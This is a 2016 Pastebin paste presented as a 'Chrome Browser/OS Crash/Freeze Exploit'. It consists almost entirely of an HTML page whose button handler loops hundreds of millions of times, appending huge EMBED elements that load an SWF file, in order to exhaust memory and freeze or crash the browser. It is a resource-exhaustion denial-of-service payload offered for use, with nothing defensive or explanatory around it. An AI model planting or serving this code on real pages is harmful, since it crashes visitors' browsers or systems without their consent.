BrU32

Chrome Browser/OS Crash/Freeze Exploit By BrU (Verified!!)

May 27th, 2016
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1.  
  2. <html>
  3. <body>
  4. <button onclick="myFunction()">Test</button>
  5. <script>
  6. function myFunction() {
  7. var out = 444444444;
  8. for(var i=0;i<out;i++){
  9. var x = document.createElement("EMBED");
  10. x.setAttribute("src", "helloworld.swf");
  11. x.setAttribute("height","10000px");
  12. x.setAttribute("width","10000px");
  13. document.body.appendChild(x);
  14. }
  15. }
  16. </script>
  17. </body>
  18. </html>
Add Comment
Please, Sign In to add comment